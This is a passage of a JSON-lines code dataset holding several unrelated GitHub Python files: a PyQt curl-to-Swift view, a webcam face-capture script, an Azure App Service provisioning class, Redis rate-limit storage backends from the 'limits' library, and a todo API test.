self.curl_label = QLabel(\"cURL:\")\n self.left_half_frame = QFrame()\n self.left_half_layout = QVBoxLayout()\n self.left_half_frame.setLayout(self.left_half_layout)\n\n form_layout = QFormLayout()\n form_layout.addRow(\"Request name: \", self.request_name_input)\n form_layout.addRow(\"Description: \", self.description_input)\n form_layout.setFormAlignment(QtCore.Qt.AlignmentFlag.AlignLeft)\n form_layout.setContentsMargins(0, 10, 0, 10)\n\n self.left_half_layout.addLayout(form_layout)\n self.left_half_layout.addWidget(self.curl_label)\n self.left_half_layout.addWidget(self.curl_text_edit)\n self.splitter.addWidget(self.left_half_frame)\n\n def _setup_output_part(self):\n self.go_button = QPushButton(\"MAKE REQUEST AND CREATE RESPONSE MAPPING\")\n self.test_with_dynamic_values_setter_checkbox = QCheckBox(\n \"Use dynamic values setter\"\n )\n self.test_with_dynamic_values_setter_checkbox.stateChanged.connect(\n self.presenter.test_with_dynamic_values_setter_checkbox_change\n )\n self.right_half_frame = QFrame()\n self.right_half_layout = QVBoxLayout()\n self.right_half_frame.setLayout(self.right_half_layout)\n self.tabs = self._get_tabs()\n self.right_half_layout.addWidget(self.tabs)\n self.splitter.addWidget(self.right_half_frame)\n\n def _get_tabs(self):\n tabs = QTabWidget()\n self.request_text_edit = SwiftHighlighter()\n self.unit_test_text_edit = SwiftHighlighter()\n tabs.addTab(\n self._create_tab([self.request_text_edit, self.go_button]),\n \"RequestSpecBuilder\",\n )\n tabs.addTab(\n self._create_tab(\n [\n self.unit_test_text_edit,\n self.test_with_dynamic_values_setter_checkbox,\n ]\n ),\n \"Unit test\",\n )\n return tabs\n\n def _create_tab(self, widgets):\n tab_widget = QWidget()\n layout = QVBoxLayout()\n for widget in widgets:\n layout.addWidget(widget)\n tab_widget.setLayout(layout)\n return tab_widget\n\n # --- Interaction binding ---\n def _bind_interactions(self):\n self.request_name_input.textChanged.connect(self._on_input_change)\n self.description_input.textChanged.connect(self._on_input_change)\n self.curl_text_edit.textChanged.connect(self._on_input_change)\n self.go_button.clicked.connect(self._on_go_button_click)\n\n def _on_input_change(self):\n self.presenter.on_input_changed(self.user_input)\n\n def _on_go_button_click(self):\n self.presenter.on_go_button_click()\n\n # --- Data binding ---\n def on_output_change(self, view_model: ViewModel):\n scroll_position = self.unit_test_text_edit.verticalScrollBar().value()\n self.unit_test_text_edit.setText(view_model.unit_test_tab_text)\n self.unit_test_text_edit.verticalScrollBar().setValue(scroll_position)\n\n scroll_position = self.request_text_edit.verticalScrollBar().value()\n self.request_text_edit.setText(view_model.request_tab_text)\n self.request_text_edit.verticalScrollBar().setValue(scroll_position)\n\n def on_dynamic_values_change(self, view_model: ViewModel):\n self.selector.update(view_model)\n", "repo_name": "tomnvt/curl2swift", "sub_path": "curl2swift/layers/presentation/content_view.py", "file_name": "content_view.py", "file_ext": "py", "file_size_in_byte": 6041, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.NamedTuple", "line_number": 41, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 47, "usage_type": "name"}, {"api_name": "curl2swift.layers.presentation.content_presenter.ContentPresenter", "line_number": 62, "usage_type": "call"}, {"api_name": "curl2swift.layers.presentation.dynamic_parameters_selector_view.DynamicParamsSelectorView", "line_number": 65, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 72, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QSplitter", "line_number": 73, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 84, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 87, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPlainTextEdit", "line_number": 89, "usage_type": "call"}, {"api_name": "curl2swift.layers.presentation.curl_highlighter.CurlHighlighter", "line_number": 90, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 92, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFrame", "line_number": 93, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 94, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFormLayout", "line_number": 97, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 100, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 100, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 109, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QCheckBox", "line_number": 110, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFrame", "line_number": 116, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 117, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTabWidget", "line_number": 124, "usage_type": "call"}, {"api_name": "curl2swift.layers.presentation.swift_highlighter.SwiftHighlighter", "line_number": 125, "usage_type": "call"}, {"api_name": "curl2swift.layers.presentation.swift_highlighter.SwiftHighlighter", "line_number": 126, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 143, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 144, "usage_type": "call"}, {"api_name": "curl2swift.layers.presentation.content_presenter.ViewModel", "line_number": 164, "usage_type": "name"}, {"api_name": "curl2swift.layers.presentation.content_presenter.ViewModel", "line_number": 173, "usage_type": "name"}]} +{"seq_id": "6924354408", "text": "import cv2\nimport numpy as np\nfrom os import makedirs\nfrom os.path import isdir\n\n# 얼굴 저장\nface_dirs = 'faces/'\nface_classifier = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\n\ndef face_extractor(img): # 얼굴 검출 \n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n faces = face_classifier.detectMultiScale(gray,1.3,5)\n if faces is():\n return None\n for(x,y,w,h) in faces:\n cropped_face = img[y:y+h, x:x+w]\n return cropped_face\n\ndef take_pictures(name): # 얼굴 저장하는 장소\n if not isdir(face_dirs+name):\n makedirs(face_dirs+name)\n \n cap = cv2.VideoCapture(0)\n count = 0\n\n # 사진찍기\n while True:\n ret, frame = cap.read()\n if face_extractor(frame) is not None: \n count+=1\n face = cv2.resize(face_extractor(frame),(200,200))\n face = cv2.cvtColor(face, cv2.COLOR_BGR2GRAY)\n\n file_name_path = face_dirs + name + '/user'+str(count)+'.jpg'\n cv2.imwrite(file_name_path,face)\n\n cv2.putText(face,str(count),(50,50),cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)\n cv2.imshow('Face Cropper',face)\n else:\n print(\"얼굴을 찾을 수 없습니다.\")\n pass\n if cv2.waitKey(1)==13 or count==300: #300장 찍고 끝\n break\n\n cap.release()\n cv2.destroyAllWindows()\n print('Colleting 완료!!!')\n\n\nif __name__ == \"__main__\":\n take_pictures('DU')\n ", "repo_name": "Xproject-Team5/ONOON_FINAL", "sub_path": "xproject/ml/face recog 1.py", "file_name": "face recog 1.py", "file_ext": "py", "file_size_in_byte": 1483, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.CascadeClassifier", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 21, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 33, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 38, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "31656429694", "text": "import json\nimport os\nimport subprocess\nfrom infra.keyvault.keyvault import KeyVault\n\nclass AppService:\n def __init__(self, web_client, resource_group, subscription_id):\n self.web_client = web_client\n self.resource_group = resource_group\n self.subscription_id = subscription_id\n\n def __execute_command(self, command):\n process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n response = process.communicate()\n json_message = response[0].decode()\n return (process.returncode, '' if json_message == '' else json.loads(json_message))\n\n def provision(self, config_name, location, environment):\n # Load microservices config.json\n current_dir = os.path.dirname(__file__)\n config_file = os.path.join(\n current_dir, \"config\", config_name, \"app_service\", \"config.json\")\n microservices_config_file = open(config_file)\n microservices_config = json.load(microservices_config_file)\n print(f\"Loaded microservices config file {config_file}\")\n\n for microservice in microservices_config:\n microservice_name = microservice + \"-\" + environment\n\n # Fetch the AppServicePlan Id\n app_service_plan = self.web_client.app_service_plans.get(\n self.resource_group,\n microservices_config[microservice]['app-service-plan'] + \"-\" + environment \n )\n\n # Assigning the subnet equivalent of App service plan. Can include this in the config\n if microservices_config[microservice]['vnet-enabled'] is False:\n subnet = None\n else:\n vnet = f\"/subscriptions/{self.subscription_id}/resourceGroups/{self.resource_group}/providers/Microsoft.Network/virtualNetworks/TDEI-\" + environment + \"-VNET/subnets/\"\n subnet = vnet + microservices_config[microservice]['app-service-plan'] + \"-subnet\"\n\n if microservices_config[microservice]['publicNetworkAccess'] is None:\n public_access = None\n else:\n public_access = microservices_config[microservice]['publicNetworkAccess']\n\n print(f\"Provisioning App Service: {microservice_name}\")\n web_app_result = self.web_client.web_apps.begin_create_or_update(\n self.resource_group,\n microservice_name,\n {\n \"location\": location,\n \"server_farm_id\": app_service_plan.id,\n \"vnetRouteAllEnabled\": microservices_config[microservice]['vnet-enabled'],\n \"virtualNetworkSubnetId\": subnet,\n \"publicNetworkAccess\": public_access,\n \"site_config\": {\n \"linux_fx_version\": microservices_config[microservice]['linux-fx-version'],\n \"always_on\": microservices_config[microservice]['always-on']\n },\n }\n ).result()\n print(f\"Completed - {web_app_result.default_host_name}. Configuring Health Check for it\")\n print(f\"Completed -Id is {web_app_result.id}.\")\n KeyVault.setSecret(microservice + '-hostname', web_app_result.default_host_name)\n site_config = self.web_client.web_apps.get_configuration(self.resource_group, microservice_name)\n\n # Not all app services have health check. Example: API-gateway-spec\n if \"health-check-path\" in microservices_config[microservice]:\n site_config.health_check_path = microservices_config[microservice]['health-check-path']\n site_config.health_check_http_status = microservices_config[microservice]['health-check-http-status']\n\n # Keycloak service requires a startup command line\n if \"appCommandLine\" in microservices_config[microservice]:\n site_config.app_command_line = microservices_config[microservice]['appCommandLine']\n self.web_client.web_apps.update_configuration(self.resource_group, microservice_name, site_config)\n print(\"Completed Configuring Health Check\")\n\n # Cors Settings. If cors needs an array, loop through the array\n if \"cors-settings\" in microservices_config[microservice]:\n KeyVault.substitue_expression(microservices_config[microservice]['cors-settings'])\n command = 'az webapp cors add --resource-group ' + self.resource_group + ' --name ' + microservice_name + ' --allowed-origins ' + microservices_config[microservice]['cors-settings']['allowed-origins']\n return_code, result = self.__execute_command(command)\n if return_code == 0:\n print(result)\n else:\n print('Failed to create CORS')\n\n if microservices_config[microservice]['vnet-enabled'] is True:\n # Provisioning Private Endpoint Connection\n pe_command = 'az network private-endpoint create --resource-group ' + self.resource_group + ' --name ' + microservice_name + '-pe --vnet-name ' + 'TDEI-' + environment + '-VNET --subnet TDEI-pe-subnet --private-connection-resource-id ' + web_app_result.id + ' --connection-name ' + microservice_name + 'plsc --group-id sites'\n print(pe_command)\n return_code, result = self.__execute_command(pe_command)\n if return_code == 0:\n print(result)\n else:\n print('Failed to create private endpoint')\n\n\n", "repo_name": "TaskarCenterAtUW/TDEI-IaC", "sub_path": "infra/app_services/app_service.py", "file_name": "app_service.py", "file_ext": "py", "file_size_in_byte": 5554, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "subprocess.Popen", "line_number": 13, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 13, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 24, "usage_type": "call"}, {"api_name": "infra.keyvault.keyvault.KeyVault.setSecret", "line_number": 66, "usage_type": "call"}, {"api_name": "infra.keyvault.keyvault.KeyVault", "line_number": 66, "usage_type": "name"}, {"api_name": "infra.keyvault.keyvault.KeyVault.substitue_expression", "line_number": 82, "usage_type": "call"}, {"api_name": "infra.keyvault.keyvault.KeyVault", "line_number": 82, "usage_type": "name"}]} +{"seq_id": "75330558563", "text": "import time\nimport urllib\nfrom typing import TYPE_CHECKING, cast\n\nfrom deprecated.sphinx import versionadded\nfrom packaging.version import Version\n\nfrom limits.aio.storage.base import MovingWindowSupport, Storage\nfrom limits.errors import ConfigurationError\nfrom limits.typing import AsyncRedisClient, Dict, Optional, Tuple, Union\nfrom limits.util import get_package_data\n\nif TYPE_CHECKING:\n import coredis\n import coredis.commands\n\n\nclass RedisInteractor:\n RES_DIR = \"resources/redis/lua_scripts\"\n\n SCRIPT_MOVING_WINDOW = get_package_data(f\"{RES_DIR}/moving_window.lua\")\n SCRIPT_ACQUIRE_MOVING_WINDOW = get_package_data(\n f\"{RES_DIR}/acquire_moving_window.lua\"\n )\n SCRIPT_CLEAR_KEYS = get_package_data(f\"{RES_DIR}/clear_keys.lua\")\n SCRIPT_INCR_EXPIRE = get_package_data(f\"{RES_DIR}/incr_expire.lua\")\n\n lua_moving_window: \"coredis.commands.Script[bytes]\"\n lua_acquire_window: \"coredis.commands.Script[bytes]\"\n lua_clear_keys: \"coredis.commands.Script[bytes]\"\n lua_incr_expire: \"coredis.commands.Script[bytes]\"\n\n async def _incr(\n self,\n key: str,\n expiry: int,\n connection: AsyncRedisClient,\n elastic_expiry: bool = False,\n amount: int = 1,\n ) -> int:\n \"\"\"\n increments the counter for a given rate limit key\n\n :param connection: Redis connection\n :param key: the key to increment\n :param expiry: amount in seconds for the key to expire in\n :param amount: the number to increment by\n \"\"\"\n value = await connection.incrby(key, amount)\n\n if elastic_expiry or value == amount:\n await connection.expire(key, expiry)\n\n return value\n\n async def _get(self, key: str, connection: AsyncRedisClient) -> int:\n \"\"\"\n :param connection: Redis connection\n :param key: the key to get the counter value for\n \"\"\"\n\n return int(await connection.get(key) or 0)\n\n async def _clear(self, key: str, connection: AsyncRedisClient) -> None:\n \"\"\"\n :param key: the key to clear rate limits for\n :param connection: Redis connection\n \"\"\"\n await connection.delete([key])\n\n async def get_moving_window(\n self, key: str, limit: int, expiry: int\n ) -> Tuple[int, int]:\n \"\"\"\n returns the starting point and the number of entries in the moving\n window\n\n :param key: rate limit key\n :param expiry: expiry of entry\n :return: (start of window, number of acquired entries)\n \"\"\"\n timestamp = int(time.time())\n window = await self.lua_moving_window.execute(\n [key], [int(timestamp - expiry), limit]\n )\n if window:\n return tuple(window) # type: ignore\n return timestamp, 0\n\n async def _acquire_entry(\n self,\n key: str,\n limit: int,\n expiry: int,\n connection: AsyncRedisClient,\n amount: int = 1,\n ) -> bool:\n \"\"\"\n :param key: rate limit key to acquire an entry in\n :param limit: amount of entries allowed\n :param expiry: expiry of the entry\n :param connection: Redis connection\n \"\"\"\n timestamp = time.time()\n acquired = await self.lua_acquire_window.execute(\n [key], [timestamp, limit, expiry, amount]\n )\n\n return bool(acquired)\n\n async def _get_expiry(self, key: str, connection: AsyncRedisClient) -> int:\n \"\"\"\n :param key: the key to get the expiry for\n :param connection: Redis connection\n \"\"\"\n\n return int(max(await connection.ttl(key), 0) + time.time())\n\n async def _check(self, connection: AsyncRedisClient) -> bool:\n \"\"\"\n check if storage is healthy\n\n :param connection: Redis connection\n \"\"\"\n try:\n await connection.ping()\n\n return True\n except: # noqa\n return False\n\n\n@versionadded(version=\"2.1\")\nclass RedisStorage(RedisInteractor, Storage, MovingWindowSupport):\n \"\"\"\n Rate limit storage with redis as backend.\n\n Depends on :pypi:`coredis`\n \"\"\"\n\n STORAGE_SCHEME = [\"async+redis\", \"async+rediss\", \"async+redis+unix\"]\n \"\"\"\n The storage schemes for redis to be used in an async context\n \"\"\"\n DEPENDENCIES = {\"coredis\": Version(\"3.4.0\")}\n\n def __init__(\n self,\n uri: str,\n connection_pool: Optional[\"coredis.ConnectionPool\"] = None,\n **options: Union[float, str, bool],\n ) -> None:\n \"\"\"\n :param uri: uri of the form:\n\n - ``async+redis://[:password]@host:port``\n - ``async+redis://[:password]@host:port/db``\n - ``async+rediss://[:password]@host:port``\n - ``async+unix:///path/to/sock`` etc...\n\n This uri is passed directly to :meth:`coredis.Redis.from_url` with\n the initial ``async`` removed, except for the case of ``async+redis+unix``\n where it is replaced with ``unix``.\n :param connection_pool: if provided, the redis client is initialized with\n the connection pool and any other params passed as :paramref:`options`\n :param options: all remaining keyword arguments are passed\n directly to the constructor of :class:`coredis.Redis`\n :raise ConfigurationError: when the redis library is not available\n \"\"\"\n uri = uri.replace(\"async+redis\", \"redis\", 1)\n uri = uri.replace(\"redis+unix\", \"unix\")\n\n super().__init__(uri, **options)\n\n self.dependency = self.dependencies[\"coredis\"].module\n\n if connection_pool:\n self.storage = self.dependency.Redis(\n connection_pool=connection_pool, **options\n )\n else:\n self.storage = self.dependency.Redis.from_url(uri, **options)\n\n self.initialize_storage(uri)\n\n def initialize_storage(self, _uri: str) -> None:\n # all these methods are coroutines, so must be called with await\n self.lua_moving_window = self.storage.register_script(self.SCRIPT_MOVING_WINDOW)\n self.lua_acquire_window = self.storage.register_script(\n self.SCRIPT_ACQUIRE_MOVING_WINDOW\n )\n self.lua_clear_keys = self.storage.register_script(self.SCRIPT_CLEAR_KEYS)\n self.lua_incr_expire = self.storage.register_script(\n RedisStorage.SCRIPT_INCR_EXPIRE\n )\n\n async def incr(\n self, key: str, expiry: int, elastic_expiry: bool = False, amount: int = 1\n ) -> int:\n \"\"\"\n increments the counter for a given rate limit key\n\n :param key: the key to increment\n :param expiry: amount in seconds for the key to expire in\n :param amount: the number to increment by\n \"\"\"\n\n if elastic_expiry:\n return await super()._incr(\n key, expiry, self.storage, elastic_expiry, amount\n )\n else:\n return cast(\n int, await self.lua_incr_expire.execute([key], [expiry, amount])\n )\n\n async def get(self, key: str) -> int:\n \"\"\"\n :param key: the key to get the counter value for\n \"\"\"\n\n return await super()._get(key, self.storage)\n\n async def clear(self, key: str) -> None:\n \"\"\"\n :param key: the key to clear rate limits for\n \"\"\"\n\n return await super()._clear(key, self.storage)\n\n async def acquire_entry(\n self, key: str, limit: int, expiry: int, amount: int = 1\n ) -> bool:\n \"\"\"\n :param key: rate limit key to acquire an entry in\n :param limit: amount of entries allowed\n :param expiry: expiry of the entry\n :param amount: the number of entries to acquire\n \"\"\"\n\n return await super()._acquire_entry(key, limit, expiry, self.storage, amount)\n\n async def get_expiry(self, key: str) -> int:\n \"\"\"\n :param key: the key to get the expiry for\n \"\"\"\n\n return await super()._get_expiry(key, self.storage)\n\n async def check(self) -> bool:\n \"\"\"\n Check if storage is healthy by calling :meth:`coredis.Redis.ping`\n \"\"\"\n\n return await super()._check(self.storage)\n\n async def reset(self) -> Optional[int]:\n \"\"\"\n This function calls a Lua Script to delete keys prefixed with 'LIMITER'\n in block of 5000.\n\n .. warning:: This operation was designed to be fast, but was not tested\n on a large production based system. Be careful with its usage as it\n could be slow on very large data sets.\n \"\"\"\n\n return cast(int, await self.lua_clear_keys.execute([\"LIMITER*\"]))\n\n\n@versionadded(version=\"2.1\")\nclass RedisClusterStorage(RedisStorage):\n \"\"\"\n Rate limit storage with redis cluster as backend\n\n Depends on :pypi:`coredis`\n \"\"\"\n\n STORAGE_SCHEME = [\"async+redis+cluster\"]\n \"\"\"\n The storage schemes for redis cluster to be used in an async context\n \"\"\"\n\n DEFAULT_OPTIONS: Dict[str, Union[float, str, bool]] = {\n \"max_connections\": 1000,\n }\n \"Default options passed to :class:`coredis.RedisCluster`\"\n\n def __init__(self, uri: str, **options: Union[float, str, bool]) -> None:\n \"\"\"\n :param uri: url of the form\n ``async+redis+cluster://[:password]@host:port,host:port``\n :param options: all remaining keyword arguments are passed\n directly to the constructor of :class:`coredis.RedisCluster`\n :raise ConfigurationError: when the coredis library is not\n available or if the redis host cannot be pinged.\n \"\"\"\n parsed = urllib.parse.urlparse(uri)\n parsed_auth: Dict[str, Union[float, str, bool]] = {}\n\n if parsed.username:\n parsed_auth[\"username\"] = parsed.username\n if parsed.password:\n parsed_auth[\"password\"] = parsed.password\n\n sep = parsed.netloc.find(\"@\") + 1\n cluster_hosts = []\n\n for loc in parsed.netloc[sep:].split(\",\"):\n host, port = loc.split(\":\")\n cluster_hosts.append({\"host\": host, \"port\": int(port)})\n\n super(RedisStorage, self).__init__(uri, **options)\n\n self.dependency = self.dependencies[\"coredis\"].module\n\n self.storage: \"coredis.RedisCluster[str]\" = self.dependency.RedisCluster(\n startup_nodes=cluster_hosts,\n **{**self.DEFAULT_OPTIONS, **parsed_auth, **options},\n )\n self.initialize_storage(uri)\n\n async def reset(self) -> Optional[int]:\n \"\"\"\n Redis Clusters are sharded and deleting across shards\n can't be done atomically. Because of this, this reset loops over all\n keys that are prefixed with 'LIMITER' and calls delete on them, one at\n a time.\n\n .. warning:: This operation was not tested with extremely large data sets.\n On a large production based system, care should be taken with its\n usage as it could be slow on very large data sets\n \"\"\"\n\n keys = await self.storage.keys(\"LIMITER*\")\n count = 0\n for key in keys:\n count += await self.storage.delete([key])\n return count\n\n\n@versionadded(version=\"2.1\")\nclass RedisSentinelStorage(RedisStorage):\n \"\"\"\n Rate limit storage with redis sentinel as backend\n\n Depends on :pypi:`coredis`\n \"\"\"\n\n STORAGE_SCHEME = [\"async+redis+sentinel\"]\n \"\"\"The storage scheme for redis accessed via a redis sentinel installation\"\"\"\n\n DEPENDENCIES = {\"coredis.sentinel\": Version(\"3.4.0\")}\n\n def __init__(\n self,\n uri: str,\n service_name: Optional[str] = None,\n use_replicas: bool = True,\n sentinel_kwargs: Optional[Dict[str, Union[float, str, bool]]] = None,\n **options: Union[float, str, bool],\n ):\n \"\"\"\n :param uri: url of the form\n ``async+redis+sentinel://host:port,host:port/service_name``\n :param service_name, optional: sentinel service name\n (if not provided in `uri`)\n :param use_replicas: Whether to use replicas for read only operations\n :param sentinel_kwargs, optional: kwargs to pass as\n ``sentinel_kwargs`` to :class:`coredis.sentinel.Sentinel`\n :param options: all remaining keyword arguments are passed\n directly to the constructor of :class:`coredis.sentinel.Sentinel`\n :raise ConfigurationError: when the coredis library is not available\n or if the redis primary host cannot be pinged.\n \"\"\"\n\n parsed = urllib.parse.urlparse(uri)\n sentinel_configuration = []\n connection_options = options.copy()\n sentinel_options = sentinel_kwargs.copy() if sentinel_kwargs else {}\n parsed_auth: Dict[str, Union[float, str, bool]] = {}\n\n if parsed.username:\n parsed_auth[\"username\"] = parsed.username\n\n if parsed.password:\n parsed_auth[\"password\"] = parsed.password\n\n sep = parsed.netloc.find(\"@\") + 1\n\n for loc in parsed.netloc[sep:].split(\",\"):\n host, port = loc.split(\":\")\n sentinel_configuration.append((host, int(port)))\n self.service_name = (\n parsed.path.replace(\"/\", \"\") if parsed.path else service_name\n )\n\n if self.service_name is None:\n raise ConfigurationError(\"'service_name' not provided\")\n\n super(RedisStorage, self).__init__()\n\n self.dependency = self.dependencies[\"coredis.sentinel\"].module\n\n self.sentinel = self.dependency.Sentinel(\n sentinel_configuration,\n sentinel_kwargs={**parsed_auth, **sentinel_options},\n **{**parsed_auth, **connection_options},\n )\n self.storage = self.sentinel.primary_for(self.service_name)\n self.storage_replica = self.sentinel.replica_for(self.service_name)\n self.use_replicas = use_replicas\n self.initialize_storage(uri)\n\n async def get(self, key: str) -> int:\n \"\"\"\n :param key: the key to get the counter value for\n \"\"\"\n\n return await super()._get(\n key, self.storage_replica if self.use_replicas else self.storage\n )\n\n async def get_expiry(self, key: str) -> int:\n \"\"\"\n :param key: the key to get the expiry for\n \"\"\"\n\n return await super()._get_expiry(\n key, self.storage_replica if self.use_replicas else self.storage\n )\n\n async def check(self) -> bool:\n \"\"\"\n Check if storage is healthy by calling :meth:`coredis.Redis.ping`\n on the replica.\n \"\"\"\n\n return await super()._check(\n self.storage_replica if self.use_replicas else self.storage\n )\n", "repo_name": "alisaifee/limits", "sub_path": "limits/aio/storage/redis.py", "file_name": "redis.py", "file_ext": "py", "file_size_in_byte": 14630, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 293, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.TYPE_CHECKING", "line_number": 13, "usage_type": "name"}, {"api_name": "limits.util.get_package_data", "line_number": 21, "usage_type": "call"}, {"api_name": "limits.util.get_package_data", "line_number": 22, "usage_type": "call"}, {"api_name": "limits.util.get_package_data", "line_number": 25, "usage_type": "call"}, {"api_name": "limits.util.get_package_data", "line_number": 26, "usage_type": "call"}, {"api_name": "limits.typing.AsyncRedisClient", "line_number": 37, "usage_type": "name"}, {"api_name": "limits.typing.AsyncRedisClient", "line_number": 56, "usage_type": "name"}, {"api_name": "limits.typing.AsyncRedisClient", "line_number": 64, "usage_type": "name"}, {"api_name": "time.time", "line_number": 82, "usage_type": "call"}, {"api_name": "limits.typing.Tuple", "line_number": 73, "usage_type": "name"}, {"api_name": "limits.typing.AsyncRedisClient", "line_number": 95, "usage_type": "name"}, {"api_name": "time.time", "line_number": 104, "usage_type": "call"}, {"api_name": "limits.typing.AsyncRedisClient", "line_number": 111, "usage_type": "name"}, {"api_name": "time.time", "line_number": 117, "usage_type": "call"}, {"api_name": "limits.typing.AsyncRedisClient", "line_number": 119, "usage_type": "name"}, {"api_name": "limits.aio.storage.base.Storage", "line_number": 134, "usage_type": "name"}, {"api_name": "limits.aio.storage.base.MovingWindowSupport", "line_number": 134, "usage_type": "name"}, {"api_name": "packaging.version.Version", "line_number": 145, "usage_type": "call"}, {"api_name": "limits.typing.Optional", "line_number": 150, "usage_type": "name"}, {"api_name": "limits.typing.Union", "line_number": 151, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 213, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 267, "usage_type": "call"}, {"api_name": "limits.typing.Optional", "line_number": 257, "usage_type": "name"}, {"api_name": "deprecated.sphinx.versionadded", "line_number": 133, "usage_type": "call"}, {"api_name": "limits.typing.Dict", "line_number": 283, "usage_type": "name"}, {"api_name": "limits.typing.Union", "line_number": 283, "usage_type": "name"}, {"api_name": "limits.typing.Union", "line_number": 288, "usage_type": "name"}, {"api_name": "urllib.parse.urlparse", "line_number": 297, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 297, "usage_type": "attribute"}, {"api_name": "limits.typing.Dict", "line_number": 298, "usage_type": "name"}, {"api_name": "limits.typing.Union", "line_number": 298, "usage_type": "name"}, {"api_name": "limits.typing.Optional", "line_number": 322, "usage_type": "name"}, {"api_name": "deprecated.sphinx.versionadded", "line_number": 270, "usage_type": "call"}, {"api_name": "packaging.version.Version", "line_number": 352, "usage_type": "call"}, {"api_name": "limits.typing.Optional", "line_number": 357, "usage_type": "name"}, {"api_name": "limits.typing.Optional", "line_number": 359, "usage_type": "name"}, {"api_name": "limits.typing.Dict", "line_number": 359, "usage_type": "name"}, {"api_name": "limits.typing.Union", "line_number": 359, "usage_type": "name"}, {"api_name": "limits.typing.Union", "line_number": 360, "usage_type": "name"}, {"api_name": "urllib.parse.urlparse", "line_number": 376, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 376, "usage_type": "attribute"}, {"api_name": "limits.typing.Dict", "line_number": 380, "usage_type": "name"}, {"api_name": "limits.typing.Union", "line_number": 380, "usage_type": "name"}, {"api_name": "limits.errors.ConfigurationError", "line_number": 398, "usage_type": "call"}, {"api_name": "deprecated.sphinx.versionadded", "line_number": 341, "usage_type": "call"}]} +{"seq_id": "37098420748", "text": "from unittest import TestCase, main\nimport requests\n\n\nclass TaskListTest(TestCase):\n def test_get_returns_json_200(self):\n r = requests.get('http://localhost:5000/todo/api/v1.0/tasks')\n self.assertEqual(r.headers['Content-Type'], 'application/json')\n self.assertEqual(r.status_code, requests.codes.ok)\n\n def test_create_returns_json_201(self):\n r = requests.post('http://localhost:5000/todo/api/v1.0/tasks', data={'content': 'new task'})\n creation_date = r.json()['creation_date']\n id_ = r.json()['id']\n\n self.assertEqual(r.status_code, requests.codes.created)\n self.assertEqual(r.json(), {'content': 'new task',\n 'completed': False,\n 'id': id_,\n 'creation_date': creation_date,\n 'uri': '/todo/api/v1.0/task/' + str(id_)})\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "lukasz-f/To-Do-List", "sub_path": "todo_list_app/tests/task_list_test.py", "file_name": "task_list_test.py", "file_ext": "py", "file_size_in_byte": 965, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 5, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 7, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 9, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 12, "usage_type": "call"}, 